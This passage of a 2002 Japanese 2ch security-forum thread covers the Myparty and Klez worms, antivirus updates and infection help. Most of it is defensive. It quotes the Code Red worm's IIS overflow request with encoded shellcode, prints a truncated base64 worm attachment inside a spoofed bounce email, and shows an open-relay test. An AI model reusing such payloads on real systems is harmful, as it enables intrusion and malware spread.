2)「手動検索」にてシステム全体を検索してください。

3)検出したファイルを削除してください。

 一個のプログラムのため「駆除」できません。検知した場合は、ファ
イルを「削除」してください。

 「ウイルス発見時の処理」の設定が「ウイルス駆除」になっている場
合、「駆除失敗」となることがあります。その際は、検知したファイル
を「削除」していただければ、問題ありません。

148 :負荷分散:02/01/28 18:13
活動:
 ワームを実行すると、自身のコピーファイルを作成し実行します。こ
のファイルは C:\Recycled フォルダに"REGCTRL.EXE"という名称を使用
していることを確認しています。

 そして、マシンのレジストリよりデフォルトで使用されている SMTP
サーバの情報、また「Windows のアドレス帳ファイル」よりメールアド
レスの情報を取得します。

 これらの情報を取得できた場合には、SMTP サーバを使用して以下の内
容でメール送信を行います。

149 :名無しさん@お腹いっぱい。:02/01/28 18:14
さっさとパターンファイルアップデートできたよ。
ありがとう2chよ。。。。今日程有り難いと思ったことはない

150 :名無しさん@お腹いっぱい。:02/01/28 18:14
うちも、来たよ。
しかも、大量に。

正直、社内に蔓延・・・・・。
わたし、情シス兼ヘルプデスクなんでマジ打つだ。

いままでの、虫なら未定義でも最低でもスキャンに引っかかりはしたのになぁ。
今回は見事にスルーしやがったぁ!!

151 :NOTEPAD.EXE:02/01/28 18:21
ウィルスバスターはパターン210以降にするひつようがあります。

152 :名無しさん@お腹いっぱい。:02/01/28 18:21
シマンテックだけ日本語の情報がないな。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MYPARTY.A
http://www.nai.com/japan/virusinfo/virM.asp?v=W32/Myparty@MM
http://securityresponse.symantec.com/avcenter/venc/data/w32.myparty@mm.html


153 ::02/01/28 18:28
akaneで検索したらファイルがズラーとでてきびっくりしたよ

じつは,仲根かすみのjpgだったよ

びっくり

154 :s:02/01/28 19:12
>>152
> シマンテックだけ日本語の情報がないな。
出たけど、まだ空っぽ。
http://www.symantec.com/region/jp/sarcj/cgi-bin/virauto.cgi?vid=27750


155 :名無しさん@お腹いっぱい。:02/01/28 19:19
シマンテックってトレンドより遅いのかな?

良く言えば慎重?

156 :名無しさん@お腹いっぱい。:02/01/28 19:24
>>154
>ウィルス名: W32.Myparty@mm
>性質:    ワイルド

ワタラ

157 :墓守:02/01/28 19:26
シマンテックのウイルス送付窓口のメアド、誰か知らない?
トレンドは見つけ次第片っ端から送っているんだけど。

158 :名無しさん@お腹いっぱい。:02/01/28 19:32
http://myhome.hananet.net/~crazyghost/goto.htm

これ何ですか?トロイだって貼りまくってるヤツがいるんですが。

159 :名無しさん@お腹いっぱい。:02/01/28 19:33
>>157
NAVの検疫から送るしかない?

>>158
トロイじゃないよ。

気持ち悪い女の顔が
http://pc.2ch.net/test/read.cgi/sec/1012037926/

160 :名無しさん@お腹いっぱい。:02/01/28 19:33
>>158
俺もサカ板で踏んだ。
怖い。

161 :墓守:02/01/28 19:34
>>158
張った時点で同罪。

162 :159:02/01/28 19:35
あぁ・・このURLはると誤解されそう・・

madokaとは関係ないです。。
ただの画像と音をフルスクリーンで表示させるホームページ。

163 :墓守:02/01/28 19:36
>>159
う〜〜〜ん。
検疫から送ろうとしたら、「もう間に合ってます」なんて表示が・・・・・
しかも検疫フォルダに入らなかったものは、無視。
こうやって亜種が見逃されるんですね。

164 :名無しさん@お腹いっぱい。:02/01/28 19:40
>>163
何を見つけたの??

165 :墓守:02/01/28 19:40
今ちょっと暇なので、窓口探しの旅に出てます。

166 :名無しさん@お腹いっぱい。:02/01/28 19:41
トレンドってメアドでウィルス送るの?大変そう・・
webmaster@trendmicro.co.jp ←ここではない・・よね?

167 :名無しさん@お腹いっぱい。:02/01/28 19:45
>>165-166
ウイルスバスターから送るんだが。隔離した後、解析依頼。
フリーで解析してくれるところってあるのだろうか?

とりあえず、バスターはパターン211。
ノートン、マカフィー使っている人もちゃんと更新しましょう。

168 :墓守:02/01/28 19:48
>>164
最近見つけたのは、ちょっと不明。ポリモかかってる?

>>166
トレンドはここ。一方的に送りつけても、ちゃんと返信してきます。
support@trendmicro.co.jp

169 :名無しさん@お腹いっぱい。:02/01/28 20:29
>>167
マカフィーの更新は気をつけてやったほうがいいぞ

とりあえず1度は
マカフィーってダメなの!part2
を読んでから実行したほうがいい

170 :初心者:02/01/28 20:37
質問いいですか?
パソコン立ち上げたらメモ帳がひたすら開く、これってウィルスですか?
直し方教えてください

171 :闇鍋にケーキは禁止:02/01/28 21:08
>>170
スタートアップにNotePadが入っているかと。
スタートを右押し、スタートメニューのプログラムからスタートアップを開く。
ちなみにここに新規のテキストを入れると、面白いよ。

172 :名無しさん@お腹いっぱい。:02/01/28 21:11
でもなんでそんなことになったんだ???(w

なんか変なもんでも踏んだ?>>170

173 :初心者:02/01/28 21:30
>172
スタートアップからにしたけど直んないよー!助けて!

174 :名無しさん@お腹いっぱい。:02/01/28 21:35
>>173
それウイルスじゃないの?メモ帳に寄生するものがあると聞いたことがあるよ。

175 :174:02/01/28 21:38
>>173
こんなの見つけた
ttp://www.ipa.go.jp/security/topics/qaz2.html

176 :名無しさん@お腹いっぱい。:02/01/28 21:40
>>173
「メモ帳」「ウイルス」で検索すると山ほど引っかかる

177 :名無しさん@お腹いっぱい。:02/01/28 21:49
捕獲していないのだが >www.yahoo.com
感染手段はダブルクリックか? (w


178 :名無しさん@お腹いっぱい。:02/01/28 21:51
すみません、あまり知らないとはいえ
混乱してスレを立ててしまったんですが、
わかる方、教えてください!
今日yahoonewsで発表されたウイルスは
どういう被害があるんでしょうか?
感染してしまったと思うのですが・・・
まだ症状等含めてよくわからないんです!!
お願いします!

http://pc.2ch.net/test/read.cgi/sec/1012220835/



179 :名無しさん@お腹いっぱい。:02/01/28 21:54
レスを読まずに書き込むな。

180 :名無しさん@お腹いっぱい。:02/01/28 21:56
単発質問スレ & マルチ のダブルパンチ!

181 :名無しさん@お腹いっぱい。:02/01/28 21:59
>>178
感染したんなら、もう焦っても仕方ないよ。
ただちに駆除すべきだが、貴方が心配する
貴方の友達への感染メールは既に送信されてるハズ。


182 :あっちの5:02/01/28 22:01
ログ読む気なしの教えて君、危惧が当たってT.K.O

183 :初心者:02/01/28 22:02
治せない・・・死亡かな?

184 :ゴルゴ13階段:02/01/28 22:29
会社のパソコンで、MXを用いて動画をダウンロードしてたんです。
なにをダウンロードしていたかは聞かないでください。

それで、完了後にそれをダブルクリックして再生させたところ
WMPが立ち上がって最初の何秒か映し出されたそのとき、
いきなりシャットダウンしてされてしまったんです。

Win2000(管理者じゃないない)でいきなり
シャットダウンなんてさせられるのでしょうか?
そもそも、動画にそんなプログラムを組み込ませられるのでしょうか?

後生ですから教えてください。

185 :名無しさん@お腹いっぱい。:02/01/28 22:38
>>184
動画であれ、画像であれ地雷を埋め込む事は出来る
立ち上がらないのか?


186 :ゴルゴ13:02/01/28 23:30
>>185
いえ。後遺症は全くないのですが、ウィン2000で
そんなことされるなんて思ったことも無かったので・・・。

WMPで読み込んでもその地雷は発動しちゃうんでしょうか?
怖くて家ではMXできません。ブルブル

187 :名無しさん@お腹いっぱい。:02/01/28 23:32
>>186
会社のほうがやばいとおもうが?

188 :名無しさん@お腹いっぱい。:02/01/28 23:36
会社でMXの方がヤバい

189 :ゴルゴ:02/01/28 23:37
いえ、いいんです。会社の方は。
なんともいってこないですし。
そんなことよりも、家のマシンが壊れちゃう方がよっぽど
大事です。

190 :名無しさん@お腹いっぱい。:02/01/28 23:38
仕事しろーーバカものーーー

191 :ゴルゴ:02/01/28 23:39
というか、これだけ騒がれてんのに
MX始めるってのもバカデスよね。

もうACCAに眼をつけられたかも・・。

192 :名無しさん@お腹いっぱい。:02/01/28 23:41
(;´Д`)ACCA?

193 :ゴルゴ:02/01/28 23:42
仕事をしてる間に自動DLさせて置くんですよ。
仕事はしてますって。

194 :名無しさん@お腹いっぱい。:02/01/28 23:44
>>193
ばかすぎる

195 :ゴルゴ:02/01/28 23:49
>>192
ACCS?ASSC?だいたいそんなやつに。

>>194
やだなぁ。時間の節約ですよ。
こういうのマルチタスクっていうんですかね?
ふふ。

196 :名無しさん@お腹いっぱい。:02/01/28 23:53
>>195
逝ってろ!

197 :名無しさん@お腹いっぱい。:02/01/28 23:54
Myparty

今日最新のウイルスって・・・!!
http://pc.2ch.net/test/read.cgi/sec/1012220835/l50

198 :名無しさん@お腹いっぱい。:02/01/29 00:03
すいません、なんか、さっき友達のアドレスでメールがきてそれを開いたら
デリバリーなんたらって言う奴が(送受信するたびに)数十件入ってくるんです。
で、友達の携帯にも数十件の俺のアドレスからのメールがおくられてるらしいんですけど、
これどういうウィルスなんでしょうか?直す方法とかありませんか?

199 :名無しさん@お腹いっぱい。:02/01/29 00:04
デタ━━━━━━━━(゚∀゚)━━━━━━━━!!

200 :gorugo :02/01/29 00:09
ファイるロー愚の時代かな。

201 :名無しさん@おなかいっぱい:02/01/29 02:51
このスレすべて表示にするとウィルスが出るよ

202 :名無しさん@お腹いっぱい。:02/01/29 10:19
WORM_MYPARTY.A

今朝、早速、2通来たよ
添付ファイル名 www.myparty.yahoo.com 

203 :名無しさん@お腹いっぱい。:02/01/29 10:21
俺も昨日来たな。
partyウイルス。これが2月のBadtransになるか?

204 :名無しさん@お腹いっぱい。:02/01/29 10:44
今朝、ヤフーから登録確認のメールが来ていました。
覚えがないので間違いだろうと、登録削除しましたが、
なんか関係あるんでしょうか?
そもそもメアド間違って登録するなんて事、そうあるのかなあと、
妙な気はしたんですが。
そういえば、パスワードだったか登録名だったかが、
ai**-love****-**(*はいちおう当方で伏せ字)なんて
考えたら怪しいですね。
登録者が単に**歳の愛ちゃんって人なのかもしれませんが。(笑
ウィルスチェックには反応しなかったです。


205 :名無しさん@お腹いっぱい。:02/01/29 11:25
Undeliverable mail--"hoge"

っていうSubjectで配送できなかったメールを装ってやってくるウイルスが
2通来た。差出人はpostmaster@HOGEHOGE.COMのようにpostmasterを名乗っている。

ヘッダー読むと1通は *.att.ne.jp
もう1通はtwドメインだった。

添付ファイルのサイズは82kb

HTMLファイルとウイルスの2つのファイルが添付されている。

このウイルス何?色々調べたんだけど見つからず。

206 :名無しさん@お腹いっぱい。:02/01/29 12:06
>>205
ウィルスがenvelope senderを詐称して送っている可能性あり。
送った先に届かないと、エラーメール(差出人は当然postmaster)は
ウィルス送信者ではなく、envelope senderに届く。
envelope senderは必ずしもヘッダのFrom:とは一致しないので注意。

最近流行したものだと、Klezがこのような送信者の詐称をおこなう。
Klez.Eならファイルサイズもほぼ一致する。詐称するアドレスのリストは
http://a500.g.akamai.net/7/1776/484/00002/inet.trendmicro.co.jp/solutionfile/3250KLEZ.htm
http://www.nai.com/japan/virusinfo/virK.asp?v=W32/Klez@MM
にあるが、どうやらこれ以外のアドレスでウィルスを送信する亜種も
大量に出回っている模様。


207 :名無しさん@お腹いっぱい。:02/01/29 12:42
JS_EXCEPTに感染してるらしいのですが、
どのような害があるのですか?

208 :205:02/01/29 13:24
>>206
情報ありがとうございます。
おそらく亜種かと思います。
もう少し調べてみます。


209 :名無しさん@お腹いっぱい。:02/01/29 13:36
>>207
ウィルス辞典で自分で調べろ

210 : :02/01/30 14:55


211 :名無しさん@お腹いっぱい。:02/01/30 17:26
ノートンアンチウイルスなんすけど
PC起動時にウイルスチェックにスケジュールしてるけど
起動時にウイルスチェックが動かんぞ。
なんでかね?

212 :名無しさん@お腹いっぱい。:02/01/30 17:35
>>211
OSは何ね?

213 :名無しさん@お腹いっぱい。:02/01/30 17:36
>>212
あっ、ごめん。
XP Proっす。

214 :名無しさん@お腹いっぱい。:02/01/30 17:59
厨な質問でごめん
CODEREDがIISサーバーに攻撃かけるときに

GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0
003%u8b00%u531b%u53ff%u0078%u0000%u00=a

って文字列飛ばすけど

%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%u
cbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

この部分って何やってるの? 

215 : :02/01/30 18:29
オナニー

216 :名無しさん@お腹いっぱい。:02/01/30 18:56
あのぉ…今日お客さんとこでトレンドの InterScan VirusWall(NT版)
メンテしてたんですけど、トレンドがテスト用に配布してる Eicar.com
ってテストウイルスがあるじゃないですか。それで送受信のテストを
してたんですけど、チェックすり抜けちゃうんですけど・・・

昨日も同じテストを実施して、そん時はちゃんとテストウイルスを
ブロックしてたし、InterScan が入ってるサーバが2台ほどあるんですが
どっちもすりぬけちゃってるんです。
個人的には今日になって更新されたパターンファイル214が怪しいと
踏んでいるのですが、どなたか同じようにはまってませんか?

217 :212:02/01/30 19:28
>>211
>PC起動時にウイルスチェック
Win9xなどのリアルDOS用に用意されたオプションじゃない?
Autoexec.batなんかに記述されるヤツ。

218 :名無しさん@お腹いっぱい。:02/01/30 19:37
詳しい説明はともかく「X」の羅列がバッファオーバーフローを起こすパディング文字列、その後ろが実際の攻撃コード。(ちなみにこの一行目だけでなく、文字列全体で数KBあるぜよ)

219 : :02/01/30 19:53
>>216
システムの構成を詳しく書かないとわからん


220 :名無しさん@お腹いっぱい。:02/01/30 20:18
>>216
さっき、216 になったけど、それかな?
って、216!!

221 : :02/01/30 20:21
パターン216に変わってるよー

222 :名無しさん@お腹いっぱい。:02/01/30 20:49
216だとeicarはちゃんとはじいてくれるよ。
214でも大丈夫だったと思う。

223 :名無しさん@お腹いっぱい。:02/01/30 20:55
>>220 ワロタ
でもチョット突っ込み弱いネ

「パターン>>216かよ!!」


224 :名無しさん@お腹いっぱい。:02/01/30 21:55
パターン214ではeicarだめだったずら。
VB2002、VBCorpでも。

225 :名無しさん@Emacs:02/01/30 22:07
eicar以外のウィルスをぶつけてみて、ちゃんと検出できるか確認
OKならトレンドにクレーム
NGならおまえの設定がアホ

いずれにしてもここでうだうだ言ってても埒があかんずら。

226 :205:02/01/30 22:10
205です。
私に送られてきたKlez.Eなんですが、どうやらウイルスによって
送信されたメールではなく、悪意ある人間の仕業のようです。

理由は
・envelope-fromとFromが異なり、Fromだけpostmasterを名乗っていること
・twドメイン内にある、「envelopeを偽装することで」第三者中継が可能と
 なるSMTPサーバーからメールを送信していること
・同一のマシンから、別の第三者中継が可能なSMTPサーバー経由でもう1通別の
 ウイルス付きメールが送られてきたこと

206さんはエラーメールが「本物の」postmasterによって返信されることで私
に届いたのでは?とおっしゃっていましたが、今回postmaster@HOGEHOGE.COMと
なっている「HOGEHOGE.COM」の部分はただの転送メールアドレスなので、
postmasterアカウントでメールが送られることはあり得ないです。また、ヘッダー
のReceivedを追ってみてもそれが確認できます。


で、このウイルス送信しまくりなマシンのIPは
*.ftthosaka.att.ne.jp
なんですが、どなたか同じように送られてきた方いらっしゃいませんか?


227 :名無しさん@お腹いっぱい。:02/01/30 22:10
>>223
ビンゴォー!!!
ってか?(笑
すげいなぁ

228 :名無しさん@お腹いっぱい。:02/01/31 09:11
WINXPを導入して、しばらくMXとか使ってたら、ある日突然
デスクトップに「Death-Gm02」って18MBほどのmpegファイルが
あったのよ。

ダウンロードした覚えはないんだけど、開いてみたら延々とテトリ
スをやってる動画が流れてる・・・これってウイルスなのかな





229 :名無しさん@お腹いっぱい。:02/01/31 09:47
>228
ダウンロードした覚えがないのにデスクトップにあったというのが疑問だけど…
ぐぐるで検索したらこんなんでました。
http://www.google.com/search?hl=ja&q=Death-Gm02+%83E%83B%83%8B%83X&lr=

230 :206:02/01/31 12:31
>>226
そのウィルスつきメールだけど、下にあるみたいな感じだよね?
調べてみたら、うちの鯖でKlez.Eとして隔離されたものからいくつか見つかった。
# postmaster@microsoft.comもあったぞ(藁
おれが206で書いたのとは違って、205のアドレスを詐称しているわけではなさそうだ。
たしかにpostmasterからのエラーを装ってるけど、エラーをHTMLメールで
返すはずがないね。ただ、誰かが悪意を持って送信したのではなく、
ウィルス自身がこういうフォーマットで送ってるんだと思う。

att.ne.jpってAT&T JENSだっけ。サポートに連絡して、ウィルス感染者に
警告してもらうといい。ヘッダのIPアドレスと時刻からユーザが特定できるはず。

From: postmaster <postmaster@HOGEHOGE.COM>
To: fuga@fugaufuga.com
Subject: Undeliverable mail--"xxxxx" ← Returned mail--"xxxxx" ってのもあった
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=ZmH1Mo98155HReb00x

--ZmH1Mo98155HReb00x
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>

<FONT>The following mail can't be sent to fuga@fugafuga.com:<br>
<br>
From: hoge@HOGEHOGE.COM<br>
To: fuga@fugafuga.com<br>
Subject: xxxxx<br>
The attachment is the original mail</FONT></BODY></HTML>

--ZmH1Mo98155HReb00x
Content-Type: application/octet-stream;
name=Lfm.bat
Content-Transfer-Encoding: base64
Content-ID: <O0g53nSe8439rt>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
以下略


231 :名無しさん@お腹いっぱい。:02/01/31 13:50
216の者です。

結局のところ、パターン214で eicar のチェック漏れがあったとのこと。
トレンドマイクロへ確認しました。
BADTRANS とか HYBRIS とか送り付けてみましたがこっちは214でもOK。
今はパターン216になって、元に戻ってます。

232 :205:02/01/31 15:14


>>230
お返事ありがとうございます。

>そのウィルスつきメールだけど、下にあるみたいな感じだよね?
その通りです。HTMLのタグの感じとか、メッセージ内容などまるっきり同じです。

>エラーをHTMLメールで返すはずがないね
なるほど、言われてみればその通りですね。気が付かなかった。
さすがですね

>誰かが悪意を持って送信したのではなく ウィルス自身がこういう
>フォーマットで送ってるんだと思う。
どうやらその可能性が高いようですね、失礼しました。
ウイルスがわざわざenvelope-fromを適当なものに変えてまで
第三者中継可能なSMTPサーバーを利用しているのが不自然に思えたのです。

Klezがどのようにして送信に利用するSMTPサーバーとenvelepe-fromに使う文字列を
決定しているのかにちょっと興味があります。

もしかしたら、このウイルス感染しているマシンはSPAM送信業者の物であるかも
しれません。なぜかというと、彼から送られてきたメールが3通ほどあるのですが、
どれも利用された私のメールアドレスはSPAMが頻繁に送られてくるものだったからです。
また、それならば第三者中継可能なSMTPサーバーを普段から利用しており、
Klezがマシンからその情報を手に入れてメールを出してきたということも考えられます。

1点だけ確認させて頂きたいのですが、206さんが受け取ったそのメールの送信元は
att.ne.jp以外でしたでしょうか?

よろしくお願いします。

なお、彼からの送信は1/28あたりで終わっておりそれっきりなようですので、
ISPへの連絡は(めんどうだし)しないつもりです。


233 :第三中継可能 cc.sookmyung.ac.kr:02/01/31 15:53
Received: from cc.sookmyung.ac.kr (203.252.201.4) by sitemail.everyone.net with SMTP; **
Received: from vv68gIjB6 (localhost [127.0.0.1]) by cc.sookmyung.ac.kr (8.9.3/8.9.3) with SMTP id ** (KST)
From: tryingtokeepup@yahoo.com
Date:**
Subject: Need Help? Benefactored Program...hurry don't miss out!
---
Hello Friends,
If you need HELP and would like to be benefactored
into a new FABULOUS
program, please let me know right away!! I will put
you into a
"temporary" matrix to hold your position until the
company allows us to enter
people on Feb. 4! The overflow will be enormous.
Please reserve your
spot now!
Send your info to
benefactored@yahoo.com
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to me tryingtokeepup@yahoo.com
---
egret.sookmyung.ac.kr (pri=20)
接続に失敗:ネットワークが混雑しているか、サーバが停止している可能性があります。
-----
cc.sookmyung.ac.kr (pri=10)
< 220-InterScan Version 3.6-Build_1166 $Date: 04/24/2001 22:13:0052$: Ready
< 220 cc.sookmyung.ac.kr ESMTP Sendmail 8.9.3/8.9.3;
> HELO rlytest.nanet.co.jp
< 250 cc.sookmyung.ac.kr Hello localhost [127.0.0.1], pleased to meet you
> MAIL FROM:< http://www.nanet.co.jp/rlytest/requestedfrom@cc.sookmyung.ac.kr >
< 250 < http://www.nanet.co.jp/rlytest/requestedfrom@cc.sookmyung.ac.kr >... Sender ok
> RCPT TO:<rlytest@nanet.co.jp>
< 250 <rlytest@nanet.co.jp>... Recipient ok
> QUIT
< 221 cc.sookmyung.ac.kr closing connection
問題あり:不正な中継を受け付けます。
(203.252.201.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

234 :名無しさん@お腹いっぱい。:02/01/31 16:31
あるPCからアクセスを受けました
ファイアウォールのログは

インバウンド UDP パケット
ローカルアドレス,サービスは xxx.xxx.xxx.xxx,1900
リモートアドレス,サービスは xxx.xxx.xxx.xxx,1025
プロセス名はMPREXE.EXE

と言うものでした
これってなんですかね?
何かわかる方がいらっしゃいましたらお願いします

235 :206:02/01/31 17:01
>>232
>Klezがどのようにして送信に利用するSMTPサーバーとenvelepe-fromに使う文字列を
>決定しているのかにちょっと興味があります。

Klez.Dのときに某アンチウィルスベンダーの技術者の人から聞いたところによると、
送信に使う鯖は、メールアドレスの @ 以降のドメイン名の頭に"smtp."を
つけたものになるそうな。つまり、mona@2ch.netで出そうとするときは、
smtp.2ch.netという鯖を使うことになる。

送信に使うアドレスは、アドレス帳にあるものを使う場合と、ウィルスの中に
いくつか埋め込まれているものを使う場合の2とおりあるらしい。

>1点だけ確認させて頂きたいのですが、206さんが受け取ったそのメールの送信元は
>att.ne.jp以外でしたでしょうか?

韓国です。言葉が通じません。どないせぇ言うんじゃ。


236 :205:02/02/01 13:45
>>235
>韓国
韓国でしたか。

おかげさまで色々分かりました。どもありがとうございます。


237 :名無しさん@お腹いっぱい。:02/02/01 18:23
ウィルス感染しちまったのですが、ひどいんです・・・
自分自身のフォルダに、ウィルスメールを送りつけまくる。nimdaなら容量が
決まってるじゃないですか。ところがこいつは、各フォルダの容量ごとに変わる。
ネットにつなげない、ウィルス対策をしてなかったので(あはははは)、オンライン
チェックしたくても、ウィルスソフトを使おうにも、使えん。
どーしたもんでしょ

238 :眠い人:02/02/01 18:49
>237
投げて旅に出よう。


239 :名無しさん@お腹いっぱい。:02/02/01 19:04
たた旅すか??そんなあぁぁぁぁぁぁぁぁぁ
♪旅は〜まだ〜終わら〜ない〜〜〜♪
・・・ぷろじぇくとXしてる場合ではなかった。おながいします。

240 :名無しさん@お腹いっぱい。:02/02/01 20:11
>>237
>自分自身のフォルダに、ウィルスメールを送りつけまくる。

先生!意味がサパーリわかりません。

241 :名無しさん@お腹いっぱい。:02/02/01 20:19
先生!だから、そーゆーコトなんですぅ
ネットにつなげないので、自分自身に送りつけまくってるもよう。うぐぅ

242 :名無しさん@お腹いっぱい。:02/02/01 20:30
>>237
ウィルス対策ソフトを買って下さいNE!

243 :名無しさん@お腹いっぱい。:02/02/01 21:10
>>242先生!! ノートン先生を(2001)持ってるのですが!ネットにつなげないため、
最新プログラムを入手でけないのです!
IEを使おうとしても、”exe何ちゃらが壊れてるので開けません”って・・・ウィルスのせいか?
何とかnimdaチェックは出来たのですが、nimdaではなかった

244 :名無しさん@お腹いっぱい。:02/02/01 21:15
>>243
もーOS再インストールせよ。

245 :名無しさん@お腹いっぱい。:02/02/01 21:15
フォーマット、ね。

246 :名無しさん@お腹いっぱい。:02/02/01 21:19
>>234
最近「インバウンド UDP でアクセス受けた」って人の質問が妙に多い。

そのログにある、インバウンド UDP パケット の直前に
アウトバウンド UDP パケットがあなたのPCから出てませんか?
UDP パケット はTCPのように3wayハンドシェイクを行わないので
相手から投げたパケットか、自分で要求した返答パケットなのか、
わからないのです。だから、ファイヤーウォールの設定が
インバウンドのUDPを全てブロックする設定になっていたら
当然、そのような返答パケットもブロックされます。

蛇足ですが MPREXE.EXEは、Windowsで用意された通信プログラムで、
UDPクライアントでもあります。

247 :abc:02/02/01 21:23
これはどうですか?
http://www.yentown.net/erodepa-town/gal/nozokiya.html

248 : :02/02/01 21:25
>>244先生!またまたすみません!!
数10GBデータがあるの!でーーーーーーす
なのでリカバリーを避ける道はないものかとあがいておりますぅ
ウィルス対策ソフトも何もしてなかったのかゴルァっつうお叱りは
甘んじて受けますぅ
ととにかくデータバックアップばんがりますぅ

249 :名無しさん@お腹いっぱい。:02/02/01 21:31
>>248
Win98〜Meなら
「exe何ちゃらが壊れてるので開けません」の何ちゃらを
msconfigまたはシステムファイルチェッカーから復元してみては?

250 : :02/02/01 21:35
先生!IEを購入状態に戻す、又はコンポーネントを修復するではダメすか

251 :名無しさん@お腹いっぱい。:02/02/01 21:39
>>246
同感。確かにその系統の質問多いな。

>>243とまったく同じパターンで
「へんなヤツが俺のPCに不正アクセスしてきて、MPREXE.EXEを開こうと
 しやがった!どうやって仕返ししたろか?」…ってなアフォもいた。

252 :う〜む:02/02/01 23:46
>>251
×→>>243
○→>>234
だな…たぶん

253 :名無しさん@お腹いっぱい。:02/02/01 23:54
>>248
パーティション切ってシステムとデータ分けるといい

254 :名無しさん@お腹いっぱい。:02/02/02 04:03
なんか今日いきなりPCの起動がやけに
重くなったと思ったらPE-CHIに感染してた
で、全部駆除してもまだOutlook Expressのみ起動が重くて
ずっとウェイトがかかってる・・・
5分くらいしてようやくOutlook Expressが起動したと思ったら
POP3サーバーとメールサーバーのログインIDとパスワードが書き換わってた
ウイルスバスター2002の体験版で検索してもウイルスにはもう引っかからないのですが
Outlook Expressの起動は以前直りません、だれここの症状に心当たりのある方は
いらっしゃらないでしょうか?

255 :名無しさん@お腹いっぱい。:02/02/02 13:33
>>254
質問はageないと・・

ちなみに私はわかりません。

256 : :02/02/02 14:46
ビールス、ウイルス、バイラス、ヴィールス、ヴァイラス

257 :名無しさん@お腹いっぱい。:02/02/02 16:56
>>254
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=2219

>本来であればWINDOWS\SYSTEMフォルダに存在するIMAGEHLP.DLLが、何らかの理由により削除されると、OutlookExpressの起動が非常に遅くなります。
>同様にIMAGEHLP.DLLのファイルが削除されている場合、ウイルスバスター2001のオンライン登録時に、各種項目を入力後、送信ボタンをクリックしてからライセンキーが表示されるまでに2分〜5分ほどの時間がかかってしまうことがあります。

>ウイルスバスター2001を始め、従来のウイルスバスターにおきましても、インストール時やアンインストール時、あるいは普段の使用において、IMAGEHLP.DLLを削除する事はありません。
>したがって、ウイルスバスターをインストールする前に、既存の他社製アンチウイルスソフトのアンインストールを行う過程で削除された可能性があります。
>具体的には、McAfee社のVirusScanをアンインストールすると削除される場合があるようです。

>このような場合はWindowsのCD-ROMや、同じWindowsがインストールされた別のPCなどから、 IMAGEHLP.DLLをWINDOWS\SYSTEMフォルダに復元されることをお勧めいたします。

マカフィー入れてませんでしたか?

258 :名無しさん@お腹いっぱい。:02/02/02 16:57
Nimda.encに感染してしまいました。
で、忘れていてPCの電源切ってしまいました。
するとPC起動できなくなってしまいました。
どうしたら治りますか?

259 :名無しさん@お腹いっぱい。:02/02/02 17:16
(-∧-)おだぶつさん

260 :名無しさん@お腹いっぱい。:02/02/02 17:20
やっぱもう無理ですかね?
1Gのゲーム落としたばっかなのに・・・

261 : :02/02/02 17:36
ttp://homepage3.nifty.com/girls_and_boys~/
このページ、ウイルスを食らわせるらしいんですが、詳しくはどのようなものなんでしょうか?

262 :名無しさん@お腹いっぱい。:02/02/02 17:41
>>257
返答ありがとうございました、無事解決する事が出来ました
それと、マカフィーは入れてませんでした
最初のPE-CHIを退治する時に結構な数のファイルが隔離されたので
それが原因だったかもしれません
しかも隔離されたファイルを見ても
削除して問題なさそうだったので一括して消してしまいました
多分この中に必要なファイルがあったのかも知れないと思い
本日上書き再インストールしたところ直りました

263 :名無しさん@お腹いっぱい。:02/02/02 19:05


264 : :02/02/02 19:24
>>261
もうそれ見飽きたよ。
単なる~crazyghost/goto.htm"のコピーだし。


265 :名無しさん@お腹いっぱい。:02/02/02 19:47
EVERYDAY PEOPLEのサイトが変なんですが。
移転したんでしょうか?

266 :265:02/02/02 19:51
閉じてしまってたんですね。
くだらない質問してすいません。

267 : :02/02/02 19:53
>>265
トップページからのリンクは無いけど
http://people.site.ne.jp/2002/
とかは見えるよ

268 :質問です:02/02/02 22:07
機能、ネット(チャット)で知り合った人から、VBAをあげるといわれたのですが、
、よく知らない相手なので心配です。そのプログラムをもらうのは、
危険でしょうか。メールでもらうだけでも危険でしょうか?
怖かったのでメアドは持ってないと答えましたが、
IEからダウンロードできるようにしてあげるといわれました。
「○○○なソフトがあると便利だな」って話をしてたら、
作って上げるよってことになったのですが、どうも怪しいのです。
メールでもらったり、IEでダウンロードするだけでもダメでしょうか?
相手はかなりプログラムに詳しい人でプロだそうです。

269 :cheshire-cat:02/02/02 23:09
>>268
とりあえずもらっておいて、「相性が悪かったのか起動できなかった」とでも言っとけば?

270 :質問です:02/02/02 23:14
ありがとうございます。そうします。

271 :名無しさん@お腹いっぱい。:02/02/02 23:22
>>268は女か?
ダウンロードもIEの最新パッチあててないなら止めとけ。


272 :cheshire-cat:02/02/02 23:38
>>270
ノートンやバスターで検出できないトロイ、たくさんあるし。
用心はしすぎるって事はない。
あなたが本能的に怪しいと思った人を、信頼する理由なんて無いよ。

273 :初心者:02/02/03 00:00
今シマンテックに入れないんですけど、何故なんでしょう?
ウィルス定義したいんですけど

274 :cheshire-cat:02/02/03 00:51
>>273
シマンテックはユーザーのアカウントを米国で一括管理しているんだけど、時々「不具合」が生じてLiveUpdateで更新できなかったりする。

